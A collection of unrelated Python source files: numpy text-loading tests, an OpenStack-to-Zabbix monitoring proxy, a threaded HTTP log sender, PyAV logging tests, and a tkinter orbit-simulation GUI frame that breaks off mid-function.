dtype=[('a', int), ('b', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', int), ('b', float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
        # gh-10394
data = TextIO('color\n"red"\n"blue"')
test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
assert_equal(test.dtype, control.dtype)
assert_equal(test, control)
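    # Note: np.recfromcsv lower-cases the header names unless
    # case_sensitive=True is passed, which is why 'A,B' becomes the fields
    # ('a', 'b') in the default-case call above.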
def test_max_rows(self):
# Test the `max_rows` keyword argument.
data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
txt = TextIO(data)
a1 = np.genfromtxt(txt, max_rows=3)
a2 = np.genfromtxt(txt)
assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
assert_equal(a2, [[7, 8], [9, 10]])
# max_rows must be at least 1.
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
# An input with several invalid rows.
data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
test = np.genfromtxt(TextIO(data), max_rows=2)
control = np.array([[1., 1.], [2., 2.]])
assert_equal(test, control)
# Test keywords conflict
assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
max_rows=4)
# Test with invalid value
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
# Test with invalid not raise
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
# Structured array with field names.
data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
# Test with header, names and comments
txt = TextIO(data)
test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
# To continue reading the same "file", don't use skip_header or
# names, and use the previously determined dtype.
test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
control = np.array([(4.0, 4.0), (5.0, 5.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
# Regression test for numpy/numpy#5635 whereby large integers could
# cause OverflowErrors.
# Test the automatic definition of the output dtype
#
# 2**66 = 73786976294838206464 => should convert to float
# 2**34 = 17179869184 => should convert to int64
# 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
# int64 on 64-bit systems)
data = TextIO('73786976294838206464 17179869184 1024')
test = np.ndfromtxt(data, dtype=None)
assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
assert_(test.dtype['f0'] == float)
assert_(test.dtype['f1'] == np.int64)
assert_(test.dtype['f2'] == np.integer)
assert_allclose(test['f0'], 73786976294838206464.)
assert_equal(test['f1'], 17179869184)
assert_equal(test['f2'], 1024)
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
class TestPathUsage(object):
# Test that pathlib.Path can be used
def test_loadtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([[1.1, 2], [3, 4]])
np.savetxt(path, a)
x = np.loadtxt(path)
assert_array_equal(x, a)
def test_save_load(self):
# Test that pathlib.Path instances can be used with save.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path)
assert_array_equal(data, a)
def test_save_load_memmap(self):
# Test that pathlib.Path instances can be loaded mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path, mmap_mode='r')
assert_array_equal(data, a)
# close the mem-mapped file
del data
def test_save_load_memmap_readwrite(self):
# Test that pathlib.Path instances can be written mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
b = np.load(path, mmap_mode='r+')
a[0][0] = 5
b[0][0] = 5
del b # closes the file
data = np.load(path)
assert_array_equal(data, a)
def test_savez_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez(path, lab='place holder')
with np.load(path) as data:
assert_array_equal(data['lab'], 'place holder')
def test_savez_compressed_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez_compressed(path, lab='place holder')
data = np.load(path)
assert_array_equal(data['lab'], 'place holder')
data.close()
def test_genfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([(1, 2), (3, 4)])
np.savetxt(path, a)
data = np.genfromtxt(path)
assert_array_equal(a, data)
def test_ndfromtxt(self):
# Test outputting a standard ndarray
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(path, dtype=int)
assert_array_equal(test, control)
def test_mafromtxt(self):
# From `test_fancy_dtype_alt` above
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1,2,3.0\n4,5,6.0\n')
test = np.mafromtxt(path, delimiter=',')
control = ma.array([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)])
assert_equal(test, control)
def test_recfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(path, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_recfromcsv(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(path, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
with temppath(suffix='.gz') as name:
with open(name, 'wb') as f:
f.write(s.read())
res = np.loadtxt(name)
s.close()
assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
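# Note: np.load on an .npz archive returns an NpzFile that behaves like a
# mapping (supports 'in', .keys(), .items() and iteration) and materializes
# each array only when it is first accessed.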
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
with assert_no_gc_cycles():
np.load(f)
f.seek(0)
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
with assert_no_gc_cycles():
x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
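# A minimal, self-contained round-trip sketch of the savetxt/loadtxt pair
# exercised throughout this file (only public numpy API; the helper name
# is illustrative):
def _loadtxt_roundtrip_example():
    buf = TextIO()
    np.savetxt(buf, np.arange(6).reshape(2, 3), fmt='%d')
    buf.seek(0)
    return np.loadtxt(buf, dtype=int)  # array([[0, 1, 2], [3, 4, 5]])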
|
proxy.py | #!/usr/bin/env python
"""
Proxy for integration of resources between OpenStack's Ceilometer and Zabbix
This proxy periodically checks for changes in Ceilometer's resources and reports them to Zabbix. It is also
integrated with OpenStack's Nova and RabbitMQ to reflect changes in Projects/Tenants and Instances.
"""
############# NOTICE ######################
# ProZaC is a fork of ZabbixCeilometer-Proxy (aka ZCP),
# which is Copyright of OneSource Consultoria Informatica (http://www.onesource.pt).
# For further information about ZCP, check its GitHub:
# https://github.com/clmarques/ZabbixCeilometer-Proxy
##########################################################
### ProZaC added functionalities (in this module) ########
#
# - support to file logging through python logging library
# - support to distinct AMQP servers for nova and keystone
#
### --------------------------- ##########################
__copyright__ = "Istituto Nazionale di Fisica Nucleare (INFN)"
__license__ = "Apache 2"
__contact__ = "emidio.giorgio@ct.infn.it"
__date__ = "15/11/2014"
__version__ = "0.9"
import sys, getopt
import threading
import project_handler
import nova_handler
import readFile
import token_handler
import zabbix_handler
import ceilometer_handler
import logging
from logging.handlers import RotatingFileHandler
def init_zcp(threads, conf_file):
    """
    Initialize the Zabbix-Ceilometer proxy: logging, handlers and listener threads.
    """
    log_levels = {"DEBUG": logging.DEBUG, "INFO": logging.INFO,
                  "WARNING": logging.WARNING, "ERROR": logging.ERROR,
                  "CRITICAL": logging.CRITICAL}
conf_file = readFile.ReadConfFile(conf_file)
    zcp_logger = logging.getLogger('ZCP')
    zcp_logHandler = RotatingFileHandler(conf_file.read_option('zcp_configs', 'log_file'),
                                         mode='a', maxBytes=99999,
                                         backupCount=7)
    zcp_logHandler.setFormatter(logging.Formatter('%(asctime)-4s %(levelname)-4s %(message)s'))
    zcp_logger.addHandler(zcp_logHandler)
    zcp_logger.setLevel(log_levels[conf_file.read_option('zcp_configs', 'log_level')])
zcp_logger.info("***********************************************************************")
zcp_logger.info("Prozac is starting")
zcp_logger.info("Loading configuration options from %s" %(conf_file.conf_file_name))
    # Creation of the Keystone-dedicated Auth class,
    # responsible for managing AAA-related requests
keystone_auth = token_handler.Auth(conf_file.read_option('keystone_authtoken', 'keystone_host'),
conf_file.read_option('keystone_authtoken', 'keystone_public_port'),
conf_file.read_option('keystone_authtoken', 'admin_tenant'),
conf_file.read_option('keystone_authtoken', 'admin_user'),
conf_file.read_option('keystone_authtoken', 'admin_password'))
# Creation of the Zabbix Handler class
# Responsible for the communication with Zabbix
zabbix_hdl = zabbix_handler.ZabbixHandler(conf_file.read_option('keystone_authtoken', 'keystone_admin_port'),
conf_file.read_option('keystone_authtoken', 'nova_compute_listen_port'),
conf_file.read_option('zabbix_configs', 'zabbix_admin_user'),
conf_file.read_option('zabbix_configs', 'zabbix_admin_pass'),
conf_file.read_option('zabbix_configs', 'zabbix_host'),
conf_file.read_option('keystone_authtoken', 'keystone_host'),
conf_file.read_option('zcp_configs', 'template_name'),
conf_file.read_option('zcp_configs', 'zabbix_proxy_name'), keystone_auth)
# Creation of the Ceilometer Handler class
# Responsible for the communication with OpenStack's Ceilometer, polling for changes every N seconds
ceilometer_hdl = ceilometer_handler.CeilometerHandler(conf_file.read_option('ceilometer_configs', 'ceilometer_api_port'),
conf_file.read_option('zcp_configs', 'polling_interval'),
conf_file.read_option('zcp_configs', 'template_name'),
conf_file.read_option('ceilometer_configs', 'ceilometer_api_host'),
conf_file.read_option('zabbix_configs', 'zabbix_host'),
conf_file.read_option('zabbix_configs', 'zabbix_port'),
conf_file.read_option('zcp_configs', 'zabbix_proxy_name'),
keystone_auth)
zcp_logger.info("Listeners have been initialized, ready for Zabbix first run")
    # First run of the Zabbix handler to retrieve the necessary information
zabbix_hdl.first_run()
# Creation of the Nova Handler class
# Responsible for detecting the creation of new instances in OpenStack, translated then to Hosts in Zabbix
# nova_hdl = nova_handler.NovaEvents(conf_file.read_option('os_rabbitmq', 'rabbit_host'),
# conf_file.read_option('os_rabbitmq', 'rabbit_user'),
# conf_file.read_option('os_rabbitmq', 'rabbit_pass'), zabbix_hdl,
# ceilometer_hdl)
nova_hdl = nova_handler.NovaEvents(conf_file.read_option('rpc_settings','rpc_nova_type'),
conf_file.read_option('rpc_settings','rpc_nova_host'),
conf_file.read_option('rpc_settings','rpc_nova_user'),
conf_file.read_option('rpc_settings','rpc_nova_pass'),
zabbix_hdl, ceilometer_hdl
)
# Creation of the Project Handler class
# Responsible for detecting the creation of new tenants in OpenStack, translated then to HostGroups in Zabbix
# project_hdl = project_handler.ProjectEvents(conf_file.read_option('os_rabbitmq', 'rabbit_host'),
# conf_file.read_option('os_rabbitmq', 'rabbit_user'),
# conf_file.read_option('os_rabbitmq', 'rabbit_pass'), zabbix_hdl)
project_hdl= project_handler.ProjectEvents(conf_file.read_option('rpc_settings','rpc_keystone_type'),
conf_file.read_option('rpc_settings','rpc_keystone_host'),
conf_file.read_option('rpc_settings','rpc_keystone_user'),
conf_file.read_option('rpc_settings','rpc_keystone_pass'),
zabbix_hdl
)
#Create and append threads to threads list
th1 = threading.Thread(target=project_hdl.keystone_listener)
threads.append(th1)
th2 = threading.Thread(target=nova_hdl.nova_listener)
threads.append(th2)
    # pass the bound method itself; calling ceilometer_hdl.run() here would
    # block init_zcp and hand Thread a None target
    th3 = threading.Thread(target=ceilometer_hdl.run)
    threads.append(th3)
    # start all the threads
    for th in threads:
        th.start()
if __name__ == '__main__':
configuration_file="/root/ZabbixCeilometer-Proxy/proxy.conf"
    try:
        # getopt long option names must be given without the leading dashes
        opts, args = getopt.getopt(sys.argv[1:], "hc:", ["help", "conf="])
    except getopt.GetoptError:
        print(sys.argv[0] + " -c <configuration file>")
        sys.exit(2)
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            print(sys.argv[0] + " -c <configuration file>")
            sys.exit(0)
        elif opt in ("-c", "--conf"):
            configuration_file = arg
            print("Configuration file is " + configuration_file)
threads = []
init_zcp(threads,configuration_file)
    # wait for all threads to complete
    for th in threads:
        th.join()
# this will never be printed, as daemon is
# killed by shell
# zcp_logger.info("Prozac terminated")
|
sender.py | # This class is responsible for handling all asynchronous http
# communication
import sys
from time import sleep
from datetime import datetime
from threading import Thread, enumerate
import logging
import requests
if sys.version_info[0] == 2:
    import Queue as queue
else:
    import queue
MAX_BULK_SIZE_IN_BYTES = 1 * 1024 * 1024 # 1 MB
def get_logger(debug):
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG if debug else logging.INFO)
logger.addHandler(logging.StreamHandler(sys.stdout))
return logger
def backup_logs(logs, logger):
timestamp = datetime.now().strftime('%Y%m%d%H%M%S')
logger.info('Backing up your logs to http-upload-failures-%s.txt', timestamp)
with open('http-upload-failures-{}.txt'.format(timestamp), 'a') as f:
        f.write('\n'.join(logs))
class HttpSender:
def __init__(self,
url,
logs_drain_timeout=5,
debug=False):
self.url = url
self.logs_drain_timeout = logs_drain_timeout
self.logger = get_logger(debug)
# Function to see if the main thread is alive
self.is_main_thread_active = lambda: any(
(i.name == 'MainThread') and i.is_alive() for i in enumerate())
# Create a queue to hold logs
self.queue = queue.Queue()
self._initialize_sending_thread()
def _initialize_sending_thread(self):
self.sending_thread = Thread(target=self._drain_queue)
self.sending_thread.daemon = False
self.sending_thread.name = 'http-sending-thread'
self.sending_thread.start()
def append(self, logs_message):
if not self.sending_thread.is_alive():
self._initialize_sending_thread()
# Queue lib is thread safe, no issue here
self.queue.put(logs_message)
def flush(self):
self._flush_queue()
def _drain_queue(self):
last_try = False
while not last_try:
# If main is exited, we should run one last time and try to remove
# all logs
if not self.is_main_thread_active():
self.logger.debug(
'Identified quit of main thread, sending logs one '
'last time')
last_try = True
try:
self._flush_queue()
except Exception as e:
                self.logger.debug(
                    'Unexpected exception while draining queue to url %s, '
                    'swallowing. Exception: %s', self.url, e)
if not last_try:
sleep(self.logs_drain_timeout)
def _flush_queue(self):
# Sending logs until queue is empty
while not self.queue.empty():
logs_list = self._get_messages_up_to_max_allowed_size()
            self.logger.debug(
                'Starting to drain %s logs to url %s',
                len(logs_list), self.url)
# Not configurable from the outside
sleep_between_retries = 2
number_of_retries = 4
should_backup_to_disk = True
headers = {"Content-type": "text/plain"}
for current_try in range(number_of_retries):
should_retry = False
try:
response = requests.post(
self.url, headers=headers, data='\n'.join(logs_list))
if response.status_code != 200:
if response.status_code == 400:
                            self.logger.info(
                                'Got 400 code from url %s. This means that '
                                'some of your logs are too big, or badly '
                                'formatted. Response: %s',
                                self.url, response.text)
should_backup_to_disk = False
break
if response.status_code == 401:
                            self.logger.info(
                                'You are not authorized with url %s! Token '
                                'OK? Dropping logs...', self.url)
should_backup_to_disk = False
break
else:
                            self.logger.info(
                                'Got %s while sending logs to url %s, '
                                'Try (%s/%s). Response: %s',
                                response.status_code,
                                self.url,
                                current_try + 1,
                                number_of_retries,
                                response.text)
should_retry = True
else:
                        self.logger.debug(
                            'Successfully sent bulk of %s logs to url %s',
                            len(logs_list), self.url)
should_backup_to_disk = False
break
except Exception as e:
                    self.logger.error(
                        'Got exception while sending logs to url %s, '
                        'Try (%s/%s). Message: %s',
                        self.url, current_try + 1, number_of_retries, e)
should_retry = True
if should_retry:
sleep(sleep_between_retries)
sleep_between_retries *= 2
if should_backup_to_disk:
# Write to file
                self.logger.info(
                    'Could not send logs to url %s after %s tries, '
                    'backing up to local file system', self.url,
                    number_of_retries)
backup_logs(logs_list, self.logger)
def _get_messages_up_to_max_allowed_size(self):
logs_list = []
current_size = 0
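        # Note: sys.getsizeof reports the in-memory size of the Python string
        # object (including interpreter overhead), not the encoded payload
        # length, so the 1 MB bulk cap below is approximate.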
while not self.queue.empty():
current_log = self.queue.get()
current_size += sys.getsizeof(current_log)
logs_list.append(current_log)
if current_size >= MAX_BULK_SIZE_IN_BYTES:
break
return logs_list
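# Minimal usage sketch (not part of the original module). The endpoint URL is
# a hypothetical placeholder; HttpSender drains queued messages from a
# background thread, and flush() pushes whatever remains before exiting.
if __name__ == '__main__':
    sender = HttpSender('http://localhost:8080/logs',
                        logs_drain_timeout=2, debug=True)
    for i in range(5):
        sender.append('log line %d' % i)
    sender.flush()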
|
test_logging.py | from __future__ import division
import logging
import threading
import av.error
import av.logging
from .common import TestCase
def do_log(message):
av.logging.log(av.logging.INFO, 'test', message)
class TestLogging(TestCase):
def test_adapt_level(self):
self.assertEqual(
av.logging.adapt_level(av.logging.ERROR),
logging.ERROR
)
self.assertEqual(
av.logging.adapt_level(av.logging.WARNING),
logging.WARNING
)
self.assertEqual(
av.logging.adapt_level((av.logging.WARNING + av.logging.ERROR) // 2),
logging.WARNING
)
def test_threaded_captures(self):
with av.logging.Capture(local=True) as logs:
do_log('main')
thread = threading.Thread(target=do_log, args=('thread', ))
thread.start()
thread.join()
self.assertIn((av.logging.INFO, 'test', 'main'), logs)
def test_global_captures(self):
with av.logging.Capture(local=False) as logs:
do_log('main')
thread = threading.Thread(target=do_log, args=('thread', ))
thread.start()
thread.join()
self.assertIn((av.logging.INFO, 'test', 'main'), logs)
self.assertIn((av.logging.INFO, 'test', 'thread'), logs)
def test_repeats(self):
with av.logging.Capture() as logs:
do_log('foo')
do_log('foo')
do_log('bar')
do_log('bar')
do_log('bar')
do_log('baz')
logs = [l for l in logs if l[1] == 'test']
self.assertEqual(logs, [
(av.logging.INFO, 'test', 'foo'),
(av.logging.INFO, 'test', 'foo'),
(av.logging.INFO, 'test', 'bar'),
(av.logging.INFO, 'test', 'bar (repeated 2 more times)'),
(av.logging.INFO, 'test', 'baz'),
])
def test_error(self):
log = (av.logging.ERROR, 'test', 'This is a test.')
av.logging.log(*log)
try:
av.error.err_check(-1)
except OSError as e:
self.assertEqual(e.log, log)
else:
self.fail()
|
executeframe.py | from tkinter import ttk
import tkinter as tk
from eosim.config import GuiStyle, MissionConfig, OutputConfig
from eosim import config
import random
from tkinter import messagebox
import json
import orbitpy
import tkinter.filedialog, tkinter.messagebox
from instrupy.public_library import Instrument
from instrupy.util import *
import os
import shutil
import sys
import csv
import glob
from orbitpy import preprocess, orbitpropcov, communications, obsdatametrics, util
import threading
import time
import pandas as pd
import pickle
import copy
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rc('font', family='sans-serif')
matplotlib.rc('font', serif='Times New Roman')
matplotlib.rc('text', usetex=False)
matplotlib.rcParams.update({'font.size': 12})
import logging
logger = logging.getLogger(__name__)
class ExecuteFrame(ttk.Frame):
BTNWIDTH = 15
def __init__(self, parent, controller):
ttk.Frame.__init__(self, parent)
self.controller = controller
self.rowconfigure(0,weight=1)
self.rowconfigure(1,weight=1)
self.rowconfigure(2,weight=1)
self.columnconfigure(0,weight=1)
self.columnconfigure(1,weight=1)
self.columnconfigure(2,weight=1)
# define propagation execution frame
pexec_frame = ttk.Frame(self)
pexec_frame.grid(row=0, column=0, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
pexec_frame.columnconfigure(0,weight=1)
pexec_frame.rowconfigure(0,weight=1)
covexec_frame = ttk.Frame(self)
covexec_frame.grid(row=0, column=1, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
covexec_frame.columnconfigure(0,weight=1)
covexec_frame.rowconfigure(0,weight=1)
gndconexec_frame = ttk.Frame(self)
gndconexec_frame.grid(row=0, column=2, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
gndconexec_frame.columnconfigure(0,weight=1)
gndconexec_frame.rowconfigure(0,weight=1)
sat2satconexec_frame = ttk.Frame(self)
sat2satconexec_frame.grid(row=1, column=0, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
sat2satconexec_frame.columnconfigure(0,weight=1)
sat2satconexec_frame.rowconfigure(0,weight=1)
obsmetcalcsexec_frame = ttk.Frame(self)
obsmetcalcsexec_frame.grid(row=1, column=1, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
obsmetcalcsexec_frame.columnconfigure(0,weight=1)
obsmetcalcsexec_frame.rowconfigure(0,weight=1)
progressbar_frame = ttk.Frame(self)
progressbar_frame.grid(row=2, column=0, columnspan=3, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
progressbar_frame.columnconfigure(0,weight=1)
progressbar_frame.rowconfigure(0,weight=1)
# define the widgets inside the frames
progress_bar = ttk.Progressbar(progressbar_frame, orient='horizontal', length=300, mode='indeterminate')
progress_bar.grid(row=0, column=0, padx=20, sticky='n')
pexec_btn = tk.Button(pexec_frame, text="Orbit Propagator", width=40, wraplength=100, command=lambda:self.click_pexec_btn(progress_bar))
pexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
covexec_btn = tk.Button(covexec_frame, text="Coverage Calculator", width=40, wraplength=100, command=lambda:self.click_covexec_btn(progress_bar))
covexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
gndconexec_btn = tk.Button(gndconexec_frame, text="Ground-Station Contact Finder", width=40, wraplength=100, command=lambda:self.click_gndconexec_btn(progress_bar))
gndconexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
sat2satconexec_btn = tk.Button(sat2satconexec_frame, text="Sat-to-Sat Contact Finder", width=40, wraplength=100, command=lambda:self.click_sat2satconexec_btn(progress_bar))
sat2satconexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
obsmetcalcexec_btn = tk.Button(obsmetcalcsexec_frame, text="Obs-metrics Calculator", width=40, wraplength=100, command=lambda:self.click_obsmetcalcexec_btn(progress_bar))
obsmetcalcexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
def click_gndconexec_btn(self, progress_bar):
def real_click_gndconexec_btn():
# Execute ground-station contact finder
user_dir = config.out_config.get_user_dir()
# Gather the required inputs
with open(user_dir+ 'comm_param.p', 'rb') as f:
comm_dir = pickle.load(f)
gnd_stn_fl = pickle.load(f)
ground_stn_info = pickle.load(f)
prop_cov_param = pickle.load( open(user_dir+ "prop_cov_param.p", "rb" ) )
sat_ids = [] # list of satellites (ids)
sat_dirs = [] # list of directories where the ground station output is written
sat_state_fls = [] # list of the state files
for _indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[_indx])
sat_ids.append(pcp.sat_id)
sat_state_fls.append(pcp.sat_state_fl)
_dir = "/".join([str(x) for x in pcp.sat_state_fl.split("/")[0:-1]])+'/'
sat_dirs.append(_dir)
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
            except Exception:
raise Exception("Output Configuration not found.")
progress_bar.start(10)
if gnd_stn_fl is None and ground_stn_info is None:
logger.info("No ground-stations are specified")
else:
logger.info(".......Computing satellite-to-ground-station contact periods.......")
# compute for 1 satellite at a time to keep track of which satellites (ids) the resulting files belong to
for k in range(0,len(sat_ids)):
gnd_stn_comm = communications.GroundStationComm(sat_dirs=sat_dirs[k], sat_state_fls=sat_state_fls[k], gnd_stn_fl=gnd_stn_fl, ground_stn_info=ground_stn_info)
[gnd_stn_i, gndstncomm_concise_fls, gndstncomm_detailed_fls] = gnd_stn_comm.compute_all_contacts()
# update output configuration file
config.out_config.update_ground_stns_comm(sat_id=sat_ids[k], gnd_stn_id = gnd_stn_i, gndstncomm_concise_fls=gndstncomm_concise_fls, gndstncomm_detailed_fls=gndstncomm_detailed_fls)
logger.info(".......DONE.......")
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
        # run the ground-station contact finder in a background thread so the
        # GUI stays responsive
        threading.Thread(target=real_click_gndconexec_btn).start()
def click_sat2satconexec_btn(self, progress_bar):
def real_click_sat2satconexec_btn():
# Execute sat-to-sat contact finder
user_dir = config.out_config.get_user_dir()
# Gather the required inputs
with open(user_dir+ 'preprocess_data.p', 'rb') as f:
pi = pickle.load(f)
with open(user_dir+ 'comm_param.p', 'rb') as f:
comm_dir = pickle.load(f)
gnd_stn_fl = pickle.load(f)
ground_stn_info = pickle.load(f)
prop_cov_param = pickle.load( open(user_dir+ "prop_cov_param.p", "rb" ) )
sat_ids = [] # list of satellites (ids)
sat_dirs = [] # list of directories where the ground station output is written
sat_state_fls = [] # list of the state files
for _indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[_indx])
sat_ids.append(pcp.sat_id)
sat_state_fls.append(pcp.sat_state_fl)
_dir = "/".join([str(x) for x in pcp.sat_state_fl.split("/")[0:-1]])+'/'
sat_dirs.append(_dir)
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
            except Exception:
raise Exception("Output Configuration not found.")
logger.info(".......Computing satellite-to-satellite contact periods.......")
progress_bar.start(10)
opaque_atmos_height_km = pi.opaque_atmos_height_km
logger.info("Considering opaque atmospheric height to be : " + str(opaque_atmos_height_km) + "km")
inter_sat_comm = communications.InterSatelliteComm(sat_ids, sat_state_fls, comm_dir, opaque_atmos_height_km)
[sat1_ids, sat2_ids, intersatcomm_concise_fls, intersatcomm_detailed_fls] = inter_sat_comm.compute_all_contacts()
config.out_config.update_intersatcomm(sat1_ids=sat1_ids, sat2_ids=sat2_ids, intersatcomm_concise_fls=intersatcomm_concise_fls, intersatcomm_detailed_fls=intersatcomm_detailed_fls)
logger.info(".......DONE.......")
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
        # run the sat-to-sat contact finder in a background thread
        threading.Thread(target=real_click_sat2satconexec_btn).start()
def click_obsmetcalcexec_btn(self, progress_bar):
def real_click_obsmetcalcexec_btn():
# Execute observation metrics calculations
user_dir = config.out_config.get_user_dir()
usf = user_dir + 'MissionSpecs.json'
try:
with open(usf, 'r') as mission_specs_file:
miss_specs = util.FileUtilityFunctions.from_json(mission_specs_file)
            except Exception:
raise Exception("Mission Configuration not found.")
progress_bar.start(10)
# read in the preprocessed data
